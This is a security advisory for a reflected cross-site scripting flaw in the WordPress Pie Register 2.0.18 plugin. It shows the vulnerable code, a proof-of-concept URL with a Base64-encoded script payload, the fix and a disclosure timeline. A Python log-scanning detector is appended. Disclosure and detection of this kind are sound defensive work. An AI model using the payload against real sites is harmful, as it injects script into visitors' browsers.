WordPress Pie Register 2.0.18 Cross Site Scripting

12 Oct 2015 00:00:00 | Reported by David Moore | Type: packetstorm | Source: packetstormsecurity.com

WordPress Pie Register 2.0.18 XSS vulnerability

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | WordPress Pie Register 2.0.18 Cross Site Scripting / SQL Injection Vulnerabilities | 13 Oct 2015 00:00 | zdt |
| Circl | CVE-2015-7377 | 9 Oct 2024 12:19 | circl |
| CNVD | WordPress Pie Register Plugin Cross-Site Scripting Vulnerability | 13 Oct 2015 00:00 | cnvd |
| CVE | CVE-2015-7377 | 16 Oct 2015 20:00 | cve |
| Cvelist | CVE-2015-7377 | 16 Oct 2015 20:00 | cvelist |
| EUVD | EUVD-2015-7301 | 7 Oct 2025 00:30 | euvd |
| Nuclei | WordPress Pie-Register <2.0.19 - Cross-Site Scripting | 6 Jun 2026 03:01 | nuclei |
| NVD | CVE-2015-7377 | 16 Oct 2015 20:59 | nvd |
| OpenVAS | WordPress Pie Register Cross-Site Scripting Vulnerability | 20 Oct 2015 00:00 | openvas |
| Patchstack | WordPress Pie Register Plugin <= 2.0.18 - XSS | 25 Sep 2015 00:00 | patchstack |
`  
Details  
================  
Software: Pie Register  
Version: 2.0.18  
Homepage: https://github.com/GTSolutions/Pie-Register  
CVE: CVE-2015-7377 (Pending)  
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)  
CWE: CWE-79  
  
Description  
================  
An unauthenticated reflected XSS vulnerability in Pie Register 2.0.18 allows malicious script injection via the invitaion_code parameter. Pie Register is a WordPress plugin with over 10,000 active installs.  
  
Vulnerability  
================  
The vulnerability is due to the unsanitized GET parameter invitaion_code:  
  
From: pie-register/pie-register.php:  
647: $inv_code = base64_decode($_GET['invitaion_code']);  
. . .  
662: <h2><?php _e("Activation Code","piereg");echo " : ".$inv_code; ?></h2>  
  
Proof of concept  
================  
The payload is Base64 encoded.  
  
http://localhost/wordpress/?page=pie-register&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==  
  
Tested on Firefox 41.0 and Chrome 45.0.2454.85.  
  
Remediation  
================  
Upgrade the plugin to version 2.0.19.  
  
Timeline  
================  
2015-09-23: Discovered  
2015-09-24: Contacted vendor via website support form  
2015-08-24: Requested CVE  
2015-09-28: Vendor supplied security contact email  
2015-09-30: Report sent to vendor and wordpress.org  
2015-10-02: Vendor releases version 2.0.19 on Github - confirmed fixed  
2015-10-12: Public Disclosure  
  
References  
================  
[1] http://codex.wordpress.org/Data_Validation  
  
Discovered by  
================  
David Moore @grajagandev  
`
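Because the parameter is Base64-decoded before it is echoed, the markup never appears literally in the request line, so a plain string match over access logs misses it. The following added example (not part of the original advisory or the plugin's code) decodes the parameter the way PHP's non-strict base64_decode() does and flags values containing tag characters; the log format, IP addresses and function names are assumptions, and the flagged sample value is the one from the proof of concept above.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

PARAM = "invitaion_code"  # spelled as in the plugin source quoted in the advisory
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"[<>]")  # characters that open or close a tag in the <h2> body


def decode_like_php(value):
    """Approximate PHP's non-strict base64_decode(): characters outside the
    alphabet are discarded and missing padding is tolerated."""
    cleaned = re.sub(r"[^A-Za-z0-9+/]", "", value)
    cleaned += "=" * (-len(cleaned) % 4)
    try:
        return base64.b64decode(cleaned).decode("utf-8", "replace")
    except binascii.Error:
        return ""


def suspicious_requests(log_lines):
    """Return (client_ip, decoded_value) for requests whose decoded
    invitation code contains markup characters."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for raw in query.get(PARAM, []):
            decoded = decode_like_php(raw)
            if MARKUP.search(decoded):
                hits.append((line.split()[0], decoded))
    return hits


def _line(ip, path):
    # Assumed combined-log-style line; only the request part is parsed.
    return f'{ip} - - [12/Oct/2015:10:00:00 +0000] "GET {path} HTTP/1.1" 200 5120'


# Constructed sample log (documentation IP addresses, made-up timestamps).
BASE = "/wordpress/?page=pie-register&show_dash_widget=1&" + PARAM + "="
SAMPLE_LOG = [
    _line("192.0.2.10", BASE + base64.b64encode(b"INVITE-2015").decode()),
    _line("192.0.2.20", BASE + "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="),  # value from the advisory
    _line("192.0.2.30", "/wordpress/"),
]
```

Only the second sample line is reported; the first carries an ordinary invitation code and the third has no parameter at all.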
